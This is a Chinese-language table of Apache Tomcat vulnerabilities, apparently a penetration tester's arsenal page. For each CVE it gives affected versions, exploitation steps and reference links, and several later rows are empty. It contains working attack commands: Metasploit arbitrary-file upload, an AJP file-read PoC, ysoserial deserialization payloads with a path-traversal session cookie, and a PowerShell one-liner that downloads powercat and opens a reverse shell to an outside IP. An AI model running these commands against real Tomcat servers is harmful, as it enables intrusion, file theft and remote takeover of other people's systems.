ID
|
技術描述
|
利用場景/條件
|
過程
|
參考
|
武器庫關聯
|
---|---|---|---|---|---|
ID
|
技術描述
|
利用場景/條件
|
過程
|
參考
|
武器庫關聯
|
S1 | PUT任意文件上傳 (CVE-2017-12615) |
|
可以上傳任意文件,下面是使用msf利用該漏洞的一個示例: msfconsole -進入msf search http_put -查找該漏洞 use auxiliary/scanner/http/http_put -使用該漏洞的exp set filedata 'test put111' -設置上傳文件的內容 set filename test1.txt -設置上傳文件名 set rhosts 192.168.234.138 - 設置遠程主機ip(靶機) set rport 8080 - 設置遠程主機的訪問端口 run
|
https://blog.csdn.net/weixin_41924764/article/details/109684870 | |
S2 | 遠程代碼執行(CVE-2019-0232) |
Tomcat 9.0.0.M1~9.0.17
|
執行代碼的方式是在/cgi-bin/xxx.bat 文件后面接執行參數即可,如下圖:
|
||
S3 | Apache-Tomcat-Ajp漏洞(CVE-2020-1938) |
Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9 < 9.0.31
|
執行poc腳本驗證漏洞: python ./ CNVD-2020-10487-Tomcat-Ajp-lfi.py 本地ip –p 8009 –f WEB-INF/web.xml 可以成功訪問文件。
|
https://www.cnblogs.com/twlr/p/12341569.html |
|
S4 | Tomcat Session(CVE-2020-9484)反序列化漏洞 |
Apache Tomcat 10.0.0-M1—10.0.0-M4 Apache Tomcat 9.0.0.M1—9.0.34 Apache Tomcat 8.5.0—8.5.54 Apache Tomcat 7.0.0—7.0.103
|
下載ysoserial 一個生成java反序列化 payload 的 .jar 包 下載地址:git clone https://github.com/frohoff/ysoserial.git 執行下面語句生成 payload(這個payload應該需要生成到靶機上) java -jar ysoserial-master-30099844c6-1.jar Groovy1 "touch /tmp/2333" > /tmp/test.session
在瀏覽器抓取首頁的包添加Cookie: JSESSIONID=../../../../../tmp/test
或者直接在環境中執行POC通過JSESSION加載惡意的session持久化文件 curl 'http://172.16.1.186:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../tmp/test'
|
https://www.freebuf.com/vuls/245232.html | |
S5 |
Apache Tomcat 9.0.0.M1 to 9.0.0.M11
|
在攻擊機上: 下載ysoserial 一個生成java反序列化 payload 的 .jar 包 下載地址:git clone https://github.com/frohoff/ysoserial.git java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 127.0.0.1 10001 Groovy1 "powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.10.11 -p 8888 -e cmd"
127.0.0.1 10001 是靶機的ip+端口 192.168.10.11 8888 是反彈shell的目標ip和端口 |
https://www.cnblogs.com/csnd/p/11807623.html | ||
S6 | Tomcat本地提權漏洞(CVE-2016-1240) |
Tomcat 8 <= 8.0.36-2
|
|
https://blog.csdn.net/Fly_hps/article/details/79567605 |
|
S7 | |||||
S8 | |||||
S9 | |||||
S10 | |||||
S11 | |||||
S12 |